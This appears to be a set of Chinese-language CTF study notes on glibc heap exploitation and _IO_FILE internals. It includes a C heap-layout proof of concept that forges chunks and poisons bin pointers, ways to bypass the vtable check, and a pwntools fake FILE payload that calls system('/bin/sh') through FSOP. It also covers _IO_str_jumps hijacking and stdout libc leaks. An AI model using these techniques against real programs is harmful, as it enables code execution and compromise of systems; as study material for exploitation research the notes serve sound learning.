//间隔创建三个chunk,并且增加间隔防止合并,这三个chunk全部在unsortedbin的位置。然后创建了一个巨大的0xf000的chunk,用来填充到0x10001,目的是为了让最开始讲的tcache_perthread_struct那个0x10001作为size是合法的
void *unsorted_start = malloc(0x88);
_ = malloc(0x18);
void *unsorted_middle = malloc(0x88);
_ = malloc(0x18);
void *unsorted_end = malloc(0x88);
_ = malloc(0x18);
_ = malloc(0xf000);

//创建0x20大小的 chunk,并且伪造prev_size和下一个chunk的size:0x20
void *end_of_fake = malloc(0x18);
*(long *)end_of_fake = 0x10000;
*(long *)(end_of_fake + 0x8) = 0x20;

//填满 tcachebin
for(int i = 0 ; i < 7 ; i ++){
free(x[i]);
}

//在unsorted_start的上面设置了一个0x31的堆块并且释放,释放掉之后由于进入tcachebin会加入一个验证的key,这个key会覆盖掉原本unsorted_start的size,所以得还原
*(long *)(unsorted_start - 0x18) = 0x31;
free(unsorted_start - 0x10);
*(long *)(unsorted_start - 0x8) = 0x91;

//在unsorted_end的上面设置了一个0x21的堆块并且释放,释放掉之后由于进入tcachebin会加入一个验证的key,这个key会覆盖掉原本unsorted_start的size,所以得还原
*(long *)(unsorted_end - 0x18) = 0x21;
free(unsorted_end - 0x10);
*(long *)(unsorted_start - 0x8) = 0x91;

//在tcache_perthread_struct中,0x20大小的会在tcachebin的第一个位置,而0x30大小的会在tcachebin的第二个位置,于是就造成了0x10001这个值下面刚好是这么两个地址,这样的话,也就是说假设0x10001进入bin,那么它的fd指针将指向unsorted_end,而bk指针将指向unsorted_start

//释放了三个chunk,unsortedbin里会变成:unsorted_start->unsorted_middle->unsorted_end
free(unsorted_end);
free(unsorted_middle);
free(unsorted_start);

//将unsorted_start的fd指针变成fake_chunk,unsorted_end的bk指针变成fake_chunk
*(unsigned long *)unsorted_start = (unsigned long)(metadata+0x80);
*(unsigned long *)(unsorted_end+0x8) = (unsigned long)(metadata+0x80);

//unsortedbin变成了unsorted_start->fake_chunk->unsorted_end
//进行切割如果unsortebin 里面没有合适大小的块,则它会按顺序分配到smallbin或者largebin中,然后再进行切割,很明显这里会把unsorted_start和unsorted_end放入smallbin,而fakechunk进入largebin
//所以只要选择一个小于0x10000的块,这样在放入各自的bin之后,由于只有fakechunk进入了largebin,它一定会在某两个位置出现libc地址,而这两个位置会变成tcachebin的两个
//在此之后,如果申请相应大小的tcachebin的chunk,则会在libc上建立相应的堆块
void *meta_chunk = malloc(0x288);
assert(meta_chunk == (metadata+0x90));
}
接下来打_IO_FILE就行了,将flag设置为 0xfbad1800 ,目的是让他冲掉缓冲区,将内容输出出来 然后read_ptr,read_end,read_base这三项随意,设置为0,同时修改好 write_base write_ptr 和 write_end 然后他会输出从 write_base 到 write_ptr 中的内容

泄露libc后可以打house of apple

house of tangerine(house of orange plus)

house of minho

IO_FILE

IO数据结构

对于LBA硬盘来说,读写数据都必须一块一块的读,如果我们每次执行read,write时都是操作很少的数据,则对系统消耗非常大,因此,C库就想了一个好办法——缓冲区。所以,就比较好理解了,缓冲区是为了减少3坏操作外部硬件时的消耗产生的,一切都是以外部硬件为服务对象。

1.从外部硬件读取时。为了减少消耗,会一次从外部硬件读取一“块”数据,并放入缓冲区,然后当target需要时,再从头部慢慢读取,只到读完才再次从硬件读取。这个缓冲区叫输入缓冲区。 2.向外部硬件写入时。为了减少消耗,不会一有东西就写入,而是先将内容从source写入缓冲区,当缓冲区满了时候再将内存一起写入硬件。这个缓冲区叫输出缓冲区。

首先,以从外部硬件读取为例,我们要有输入缓冲区开始(base)、结尾(end)和当前(ptr)已经用了多少的指针。很明显当ptr == end时,说明输入缓冲区里的东西已经全部读完,需要重新从硬件读入。 同样,对于向外部硬件写入为例,我们要有输出缓冲区开始(base)、结尾(end)和当前(ptr)已经写了多少的指针。很明显当ptr == end时,说明输出缓冲区已经写满,可以向硬件写入了。

上面的内容看似非常清楚,但这里其实有一些比较容易混乱的地方。因为缓冲区内存储的是数据,输入、输出两者数据流动方向不同,但保护主体都一样,都是外部设备,所以有用的数据部分就有所不相同。 1. 对于输入缓冲区ptr-end是有用的数据,base-ptr为已使用的数据。 2. 对于输出缓冲区base-ptr是要写入硬件的内容(有用数据),ptr-end为空闲区域。 3. 两者结尾有所不同。 1. 对于输入缓冲区,因为从硬盘中读取的数据可能无法填满整个缓冲区的块,所以_IO_buf_end != _IO_read_end。输入缓冲区要使用_IO_read_end判断结束。 2. 对于输出缓冲区,缓冲区的结束就是输出缓冲区结束,_IO_buf_end == _IO_write_end。输出缓冲区往往使用_IO_buf_end判断结束。

虽然,输入、输出缓冲区作用不同,但原理上都是一块内存。一块外部设备可能既可以写入也可以读取,为了节省空间,我们可以定义一块缓冲区,需要输入的时候就做输入缓冲区,需要输出就做输出缓冲区。那么我们就有了8个指针。

char *_IO_buf_base;    //缓冲区的基地址
char *_IO_buf_end;   //缓冲区的结束地址
char *_IO_read_base; //输入缓冲区基地址
char *_IO_read_ptr;   //输入当前位置
char *_IO_read_end; //输入缓冲区结尾地址
char *_IO_write_base; //输出缓冲区基地址
char *_IO_write_ptr; //输出当前位置
char *_IO_write_end; //输出缓冲区结尾地址

从文件中读取 程序是从fd中读取一批数据到缓冲区中(_IO_buf_base 至 _IO_buf_end),_IO_read_ptr 指向已向target中写完的位置,既 _IO_read_ptr 至 _IO_read_end 为还没有写入target中的数据。当_IO_read_ptr == _IO_read_end时,说明输入缓冲区内已经没有可用数据,需要再次从文件中读入数据。

向文件输出 程序是先将source中的数据写入到缓冲区中,_IO_write_ptr 指向已从source中写到的位置,既 _IO_write_ptr 至 _IO_write_pend 为还剩余的空间。当_IO_write_ptr == _IO_buf_end时,再全部写入fd中。

IO数据操作

1.从硬盘中读入数据

  1. fd中读取一批(一块)数据到输入缓冲区中(_IO_buf_base 至 _IO_buf_end),同时对_IO_read_base _IO_read_ptr _IO_read_end 设置初始值。(_IO_read_ptr == _IO_read_base ,当然也可能不同)
  2. _IO_read_ptr 处向需要的内存中复制数据,同时把_IO_read_ptr 向后移位。
  3. _IO_read_ptr == _IO_read_end时,说明缓冲区内已经没有可用数据,需要再次从文件中读入数据。冲入第一步。

2.向硬盘中写入数据

  1. 先将source中的数据复制到输出缓冲区中,_IO_write_ptr 指向已写到的位置。
  2. _IO_write_ptr == _IO_buf_end时,将缓冲区中的内容全部写入fd中,并将_IO_write_ptr设置为 _IO_write_base,重复第一步。

3.申请缓冲区

申请一块缓冲区,并设置_IO_buf_base为开头,_IO_buf_end为结尾。

_IO_file_jumps 函数操作

1._IO_new_file_finish

是文件结束的操作,所以它的操作如下 1. 清空所有缓冲区 2. 关闭(close)文件

2._IO_new_file_overflow

主要是处理当输出缓冲区用完时,向硬盘写入数据

当然,其实这个函数内部非常复杂,加入了一些检测。例如,如果缓冲区不存在则要初始化缓冲区。并且,这个函数的参数中有一个标志位 1. 如果 ch == EOF,则输出f->_IO_write_ptr - f->_IO_write_base的区间。 2. 如果 ch != EOF,并且f->_IO_write_ptr == f->_IO_buf_end,则将缓冲区全部输出。 3. 如果 ch == '\n',则输出 f->_IO_write_ptr - f->_IO_write_base加一个换行符。 4. 以上都不满足就返回ch

3._IO_new_file_underflow

这个函数与_IO_new_file_overflow差不多,主要是用于从硬盘中读取数据,每次读取都是_IO_buf_base_IO_buf_end

为了防止硬盘中没有这么多数据,设置_IO_read_end为读取的总数。如果,缓冲区不存在则要初始化缓冲区。程序返回_IO_read_ptr指针。

4.__GI__IO_default_uflow(_IO_default_uflow)

这个函数就是调用_IO_new_file_underflow,并简单做了一些检测。

5.__GI__IO_default_pbackfail(_IO_default_pbackfail)

设置存储的函数,暂不重要。

6._IO_new_file_xsputn

这个函数是主要目的是将数据从source放入输出输出缓冲区。显然,放入过程中还有几种情况。 1. 如果要写入的数据小于剩余的空间_IO_write_ptr - _IO_buf_end,那么就直接将数据写入输出缓冲区即可。 2. 如果要写入的数据大于剩余的空间_IO_write_ptr - _IO_buf_end。 1. 先将输出缓冲区填满,再调用_IO_new_file_overflow清空输出缓冲区。 2. 剩余的数据继续调用 _IO_new_file_xsputn

说明:我们平时的输出函数主要就是调用此函数。

7.__GI__IO_file_xsgetn(_IO_file_xsgetn)

这个函数是主要目的是将数据从输入缓冲区放入target。显然放入过程中还有几种情况。 1. 如果要读取的数据小于剩余的数据_IO_read_ptr - _IO_read_end,那么就直接将数据读取到target即可。 2. 如果要读取的数据大于剩余的数据_IO_read_ptr - _IO_read_end。 1. 先将输入缓冲区全部数据读出,再调用_IO_new_file_underflow从硬盘读入一块数据。 2. 如果需要读取数据特别多,就调用__GI__IO_file_read从硬盘直接读取数据。

说明:我们平时的输入函数主要就是调用此函数。

8._IO_new_file_seekoff

设置偏移函数,就是设置我们所说的ptr指针。

9._IO_default_seekpos

就是调用_IO_new_file_seekoff

10._IO_new_file_setbuf

这个函数也比较简单,看名字就知道是设置缓冲区的,作用就是初始化各个缓冲区 1. _IO_write_base = _IO_write_ptr = _IO_write_end = _IO_buf_base 2. _IO_read_base = _IO_read_ptr = _IO_read_end = _IO_buf_base (使用 _IO_setg 宏)

11._IO_new_file_sync

同步函数,负责与硬盘和缓冲区之间进行同步。

12.__GI__IO_file_doallocate(_IO_default_doallocate)

这个就是申请缓冲区的函数,申请完之后还要把输入、输出缓冲区初始化。

13.GI__IO_file_read(_IO_file_read)

这个是输入的最终函数,它将syscall_read进行了一定的封装。

14._IO_new_file_write

这个是输出的最终函数,它将syscall_write进行了一定的封装。

15.GI__IO_file_seek(_IO_file_seek)

调用__lseek64

16.__GI__IO_file_close(_IO_file_close)

就和名字一样,关闭文件。

17.__GI__IO_file_stat(_IO_file_stat)

获取文件描述符的状态。调用__fxstat64

18._IO_default_showmanyc

此函数没用,返回-1。

19._IO_default_imbue

此函数没用。

20.其他一些内容

flag标志位

`#define _IO_MAGIC 0xFBAD0000 /* Magic number */`
`#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */`
`#define _IO_MAGIC_MASK 0xFFFF0000`
`#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */`
`#define _IO_UNBUFFERED 2`
`#define _IO_NO_READS 4 /* Reading not allowed */`
`#define _IO_NO_WRITES 8 /* Writing not allowd */`
`#define _IO_EOF_SEEN 0x10`
`#define _IO_ERR_SEEN 0x20`
`#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */`
`#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/`
`#define _IO_IN_BACKUP 0x100`
`#define _IO_LINE_BUF 0x200`
`#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */`
`#define _IO_CURRENTLY_PUTTING 0x800`
`#define _IO_IS_APPENDING 0x1000`
`#define _IO_IS_FILEBUF 0x2000`
`#define _IO_BAD_SEEN 0x4000`
`#define _IO_USER_LOCK 0x8000`

flush_IO_do_flush

清空缓冲区,将输出缓冲区清空。

全部清空函数(fflush

# define fflush(s) _IO_fflush (s)  //  /assert/assert.c
// /libio/iofflush.c
int _IO_fflush (FILE *fp)
{
  if (fp == NULL)
    return _IO_flush_all ();
  else
    {
      int result;
      CHECK_FILE (fp, EOF);
      _IO_acquire_lock (fp);
      result = _IO_SYNC (fp) ? EOF :0;
      _IO_release_lock (fp);
      return result;
    }
}
libc_hidden_def (_IO_fflush)

可以看出 fflush函数在参数为空时,清空(_IO_flush_all_lockp => _IO_OVERFLOW)全部文件;不为空时,同步(sync)指定文件,两种情况执行步骤不同。

缓冲区设置宏

_IO_setg _IO_setp 等等

虚表检测

虚表检测是2.24之后加入的内容,IO_validate_vtable检测如果虚表超出范围就进入_IO_vtable_check函数。各路大神找到的house很多都不是打file的跳表,而是其他处理跳表,但都差不太多。简要梳理如下。

  1. 2.23 的没有任何限制,可以将vtable 劫持在堆上并修改其内容,然后触发FSOP,
  2. 2.24 引入了vtable check,使得将vtable 整体劫持到堆上已不可能,大佬发现可以使用内部的vtable_IO_str_jumps_IO_wstr_jumps来进行利用。
  3. 2.31 中将_IO_str_finish函数中强制执行free函数,导致无法使用上述问题,因而催生出其他调用链。

虚表范围

虚表位置判断主要在IO_validate_vtable函数,2.37以前判断区间为_IO_helper_jumps - _IO_str_jumps之间的区域 0xd60,里面有以下虚表

_IO_helper_jumps
_IO_helper_jumps
_IO_cookie_jumps
_IO_proc_jumps
_IO_str_chk_jumps
_IO_wstrn_jumps
_IO_wstr_jumps
_IO_wfile_jumps_maybe_mmap
_IO_wfile_jumps_mmap
__GI__IO_wfile_jumps
_IO_wmem_jumps
_IO_mem_jumps
_IO_strn_jumps
_IO_obstack_jumps
_IO_file_jumps_maybe_mmap
_IO_file_jumps_mmap
__GI__IO_file_jumps
_IO_str_jumps

攻击_IO_vtable_check

IO_validate_vtable函数检查如果虚表超出范围,会进入_IO_vtable_check函数,

void attribute_hidden _IO_vtable_check (void)
{
#ifdef SHARED
  /* Honor the compatibility flag.  */
  void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (flag);
#endif
  if (flag == &_IO_vtable_check) //检查是否是外部重构的vtable
    return;
只是要满足一定条件。那么我们还是可以绕过虚表检测的 1. 泄露ptr_guard,反算IO_accept_foreign_vtables然后修改。 2. 因为IO_accept_foreign_vtables中基本都是0,直接将ptr_guard修改为&_IO_vtable_check也可以。 但无论如何我们都需要有ld文件

外置虚表

check_stdfiles_vtables函数是设置外置虚表的函数,如果能执行这个函数,也可以绕过虚表检测

static void  check_stdfiles_vtables (void)
{
  if (_IO_2_1_stdin_.vtable != &_IO_file_jumps
      || _IO_2_1_stdout_.vtable != &_IO_file_jumps
      || _IO_2_1_stderr_.vtable != &_IO_file_jumps)
    IO_set_accept_foreign_vtables (&_IO_vtable_check);
}

IO_FILE结构体

_IO_FILE_plus

0x0   _flags
0x8 _IO_read_ptr
0x10 _IO_read_end
0x18 _IO_read_base
0x20 _IO_write_base
0x28 _IO_write_ptr
0x30 _IO_write_end
0x38 _IO_buf_base
0x40 _IO_buf_end
0x48 _IO_save_base
0x50 _IO_backup_base
0x58 _IO_save_end
0x60 _markers
0x68 _chain
0x70 _fileno
0x74 _flags2
0x78 _old_offset
0x80 _cur_column
0x82 _vtable_offset
0x83 _shortbuf
0x88 _lock
0x90 _offset
0x98 _codecvt
0xa0 _wide_data
0xa8 _freeres_list
0xb0 _freeres_buf
0xb8 __pad5
0xc0 _mode
0xc4 _unused2
0xd8 vtable

_IO_wide_data

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable;
};

_IO_wstrn_jumps

const struct _IO_jump_t _IO_wstrn_jumps attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT_DUMMY2,
JUMP_INIT(finish, _IO_wstr_finish),
JUMP_INIT(overflow, (_IO_overflow_t) _IO_wstrn_overflow),
JUMP_INIT(underflow, (_IO_underflow_t) _IO_wstr_underflow),
JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wstr_pbackfail),
JUMP_INIT(xsputn, _IO_wdefault_xsputn),
JUMP_INIT(xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT(seekoff, _IO_wstr_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_wdefault_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

_IO_obstack_jumps

/* the jump table.  */
const struct _IO_jump_t _IO_obstack_jumps libio_vtable attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, _IO_obstack_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, _IO_obstack_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};

IO_FILE结构体的调用

初始化

初始情况下 _IO_FILE 结构有 * _IO_2_1_stderr_  * _IO_2_1_stdout_ * _IO_2_1_stdin_  通过 _IO_list_all 将这三个结构连接,_chain指向下一个结构体 * _IO_list_all->_IO_2_1_stderr_->_IO_2_1_stdour_->_IO_2_1_stdin_ 并且存在 3 个全局指针 * stdin指向 _IO_2_1_stdin_ * stdout指向_IO_2_1_stdout_ * stderr指向_IO_2_1_stderr_  存在函数指针结构体vatble,存放着各种 IO 相关的函数的指针

fopen

 * fopen  * _IO_new_fopen  * __fopen_internal  * malloc创建lock_FILE结构体  * _IO_no_init对结构体进行null初始化  * _IO_file_init将结构体链入_IO_list_all  * _IO_file_open执行系统调用打开文件

fread

  • fread
  • _IO_sgetn
  • _IO_file_xsgetn
  • 若缓冲区没有初始化则调用_IO_doallocbuf->_IO_file_doallocate初始化IO缓冲区,申请一块堆,只初始化_IO_buf_base、_IO_buf_end
  • 若缓冲区有数据未复制到buf,则在buf数据总量不超过所需数据的前提下尽可能多把数据复制到buf中
  • 若缓存区长度小于所需数据长度则重置缓冲区读写指针
  • _underflow调用系统函数_IO_SYSREAD向buf读入数据
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x1e0 (with flag bits: 0x1e1)

Allocated chunk | PREV_INUSE
Addr: 0x555555559470
Size: 0x1010 (with flag bits: 0x1011)

Top chunk | PREV_INUSE
Addr: 0x55555555a480
Size: 0x1fb80 (with flag bits: 0x1fb81)

pwndbg> p *(struct _IO_FILE_plus*) 0x5555555592a0
$2 = {
file = {
_flags = -72539000,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x555555559480 "",
_IO_buf_end = 0x55555555a480 "",
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7e044e0 <_IO_2_1_stderr_>,
_fileno = 3,
_flags2 = 0,
_old_offset = 0,
_cur_column = 0,
_vtable_offset = 0 '\000',
_shortbuf = "",
_lock = 0x555555559380,
_offset = -1,
_codecvt = 0x0,
_wide_data = 0x555555559390,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0,
_mode = 0,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7ffff7e02030 <_IO_file_jumps>
}
pwndbg> tele 0x5555555592a0
00:0000│ rbx 0x5555555592a0 ◂— 0xfbad2488
01:0008│ 0x5555555592a8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x5555555592d8 —▸ 0x555555559480 ◂— 0
pwndbg>
08:0040│ 0x5555555592e0 —▸ 0x55555555a480 ◂— 0
09:0048│ 0x5555555592e8 ◂— 0
... ↓ 3 skipped
0d:0068│ 0x555555559308 —▸ 0x7ffff7e044e0 (_IO_2_1_stderr_) ◂— 0xfbad2086
0e:0070│ 0x555555559310 ◂— 3
0f:0078│ 0x555555559318 ◂— 0
pwndbg>
10:0080│ 0x555555559320 ◂— 0
11:0088│ 0x555555559328 —▸ 0x555555559380 ◂— 1
12:0090│ 0x555555559330 ◂— 0xffffffffffffffff
13:0098│ 0x555555559338 ◂— 0
14:00a0│ 0x555555559340 —▸ 0x555555559390 ◂— 0
15:00a8│ 0x555555559348 ◂— 0
... ↓ 2 skipped
pwndbg>
18:00c0│ 0x555555559360 ◂— 0
... ↓ 2 skipped
1b:00d8│ 0x555555559378 —▸ 0x7ffff7e02030 (_IO_file_jumps) ◂— 0
1c:00e0│ 0x555555559380 ◂— 1
1d:00e8│ 0x555555559388 —▸ 0x7ffff7fb2740 ◂— 0x7ffff7fb2740
1e:00f0│ 0x555555559390 ◂— 0
1f:00f8│ 0x555555559398 ◂— 0
pwndbg>
20:0100│ 0x5555555593a0 ◂— 0
... ↓ 7 skipped
pwndbg>
28:0140│ 0x5555555593e0 ◂— 0
... ↓ 7 skipped
pwndbg>
30:0180│ 0x555555559420 ◂— 0
... ↓ 7 skipped
pwndbg>
38:01c0│ 0x555555559460 ◂— 0
39:01c8│ 0x555555559468 ◂— 0
3a:01d0│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
3b:01d8│ 0x555555559478 ◂— 0x1011
3c:01e0│ rsi 0x555555559480 ◂— 0
... ↓ 3 skipped
pwndbg> tele 0x555555559470
00:0000│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
01:0008│ 0x555555559478 ◂— 0x1011
02:0010│ rax rsi 0x555555559480 ◂— 'your_flag_content\n'
03:0018│ 0x555555559488 ◂— 'g_content\n'
04:0020│ 0x555555559490 ◂— 0xa74 /* 't\n' */
05:0028│ 0x555555559498 ◂— 0
... ↓ 2 skipped

fwrite

  • fwrite
  • _IO_fwrite
  • _IO_file_xsputn
  • 若缓冲区有剩余空间,则在不超过缓冲区空闲空间的前提下尽可能多的待输出数据复制到缓冲区
  • 若有数据没有复制到缓冲区中,则调用_IO_new_file_overflow输出并清空输出缓存区数据
  • new_do_while直接输出buf中数据
  • 如果还有剩余数据则调用_IO_default_xsputn复制到输出缓冲区,如果剩余长度大于20字节则使用memcpy否则直接赋值

fclose

  • fopen
  • _IO_new_fclose
  • _IO_un_link
  • _IO_file_close_it

vtable

fopen

函数是在分配空间,建立FILE结构体,未调用vtable中的函数

fread

  • _IO_sgetn函数调用了_IO_file_xsgetn
  • _IO_doallocbuf函数调用了_IO_file_doallocate以初始化输入缓冲区
  • _IO_file_doallocate调用了__GI__IO_file_stat获取文件信息
  • __underflow调用了_IO_new_file_underflow实现文件数据读取
  • _IO_new_file_underflow调用了vtable__GI__IO_file_read最终去执行系统调用read

fwrite

  • _IO_fwrite调用了_IO_new_file_xsputn
  • _IO_new_file_xsputn调用了_IO_new_file_overflow实现缓冲区的建立以及刷新缓冲区
  • _IO_new_file_overflow调用了_IO_file_doallocate以初始化输入缓冲区
  • _IO_file_doallocate调用了vtable中的 __GI__IO_file_stat以获取文件信息
  • new_do_write中的_IO_SYSWRITE调用了vtable_IO_new_file_write最终去执行系统调用write

fclose

  • 在清空缓冲区的_IO_do_write中会调用vtable中的函数
  • 关闭文件描述符_IO_SYSCLOSEvtable中的 __close函数
  • _IO_FINISHvtable中的__finish

FSOP

  • 核心思想:劫持_IO_list_all指向伪造的_IO_FILE_plus,之后使程序执行_IO_flush_all_lockp函数。该函数会刷新_IO_list_all链表中所有项的文件流,相当于对每个FILE调用fflush,也对应着会调用_IO_FILE_plus.vtable中的_IO_overflow
  • 利用前提:
    • 程序执行_IO_flush_all_lockp函数有三种情况:
      • libc执行abort流程时(2.27之后不再刷新)
      • 当执行exit函数时(仅刷新 stderr ,2.36后不再刷新)
      • 当执行流从main函数返回时
    • 绕过检查

abort栈回溯为:

_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
__GI_abort ()
__libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0x7ffff7ba0d58 "*** Error in `%s': %s: 0x%s ***\n")
malloc_printerr (action=0x3, str=0x7ffff7ba0e90 "double free or corruption (top)", ptr=<optimized out>, ar_ptr=<optimized out>)
_int_free (av=0x7ffff7dd4b20 <main_arena>, p=<optimized out>,have_lock=0x0)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()
exit函数,栈回溯为:
_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()
程序正常退出,栈回溯为:
IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
__libc_start_main (main=0x400526 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)) && _IO_OVERFLOW(fp, EOF) == EOF) {
result = EOF;
}
fake_file = b""
fake_file += b"/bin/sh\x00" # _flags, an magic number
fake_file += p64(0) # _IO_read_ptr
fake_file += p64(0) # _IO_read_end
fake_file += p64(0) # _IO_read_base
fake_file += p64(0) # _IO_write_base
fake_file += p64(libc.sym['system']) # _IO_write_ptr
fake_file += p64(0) # _IO_write_end
fake_file += p64(0) # _IO_buf_base;
fake_file += p64(0) # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4 # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_']) # the FILE chain ptr
fake_file += p32(2) # _fileno for stderr is 2
fake_file += p32(0) # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _old_offset, -1
fake_file += p16(0) # _cur_column
fake_file += b"\x00" # _vtable_offset
fake_file += b"\n" # _shortbuf[1]
fake_file += p32(0) # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0) # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _offset, -1
fake_file += p64(0) # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160) # _IO_wide_data_1
fake_file += p64(0) * 3 # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF) # _mode, usually -1
fake_file += b"\x00" * 19 # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00') # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10) # fake vtable

缓冲区利用(未完善)

stdin

任意地址写

stdout

任意地址写

任意地址读

__IO_str_jumps(under 2.27)

  • 利用_IO_str_jumps__IO_wstr_jumps填入vtable绕过IO_validate_vtable检查

  • 确定_IO_str_jumps地址

    • 由于_IO_str_jumps不是导出符号,libc.sym["_IO_str_jumps"]查不到,可以利用_IO_str_jumps中的导出函数例如 _IO_str_underflow进行辅助定位
    • 首先先得到_IO_str_underflow地址,然后查找所有指向该地址的指针
    • 由于_IO_str_underflow_IO_str_jumps的偏移为0x20,并且_IO_str_jumps的地址大于_IO_file_jumps地址,因此可以在选择满足上述条件中最小的地址作为_IO_str_jumps的地址
      from bisect import *

      IO_file_jumps = libc.symbols['_IO_file_jumps']
      IO_str_underflow = libc.symbols['_IO_str_underflow']
      IO_str_underflow_ptr = list(libc.search(p64(IO_str_underflow)))
      IO_str_jumps = IO_str_underflow_ptr[bisect_left(IO_str_underflow_ptr, IO_file_jumps + 0x20)] - 0x20
      print(hex(IO_str_jumps))
  • 劫持io_str_finish

    void
    _IO_str_finish (_IO_FILE *fp, int dummy)
    {
    if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
    (((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base);
    fp->_IO_buf_base = NULL;

    _IO_default_finish (fp, 0);
    }

  • vatble指针修改为指向&_IO_str_jumps - 8的地址就可以执行_IO_str_finish

  • fp->_IO_buf_base不为空,并且作为fp->_s._free_buffer的第一个参数,因此可以使用/bin/sh的地址

  • fp->_flags要不包含_IO_USER_BUF,它的定义为#define _IO_USER_BUF 1,即fp->_flags最低位为0

  • _IO_write_base < _IO_write_ptr_mode <= 0

  • 修改((_IO_strfile *) fp)->_s._free_buffersystem地址,即将fp+0xE8处的值改为system地址

  • 执行_IO_flush_all_lockp

堆利用结合

leak libc

libc-2.23

  • fastbin attack 在 _IO_2_1_stdout_-0x43 处申请 fastbin
  • 修改_IO_write_base指针的最低 1 字节使其指向_chain变量,而_chain变量中存储了_IO_2_1_stdin_结构体地址,程序在下一次输出内容时会先将 write buf 中的内容输出出来

vtable

  • fastbin attack_IO_2_1_stdout_+157地址处申请0x60大小的堆块
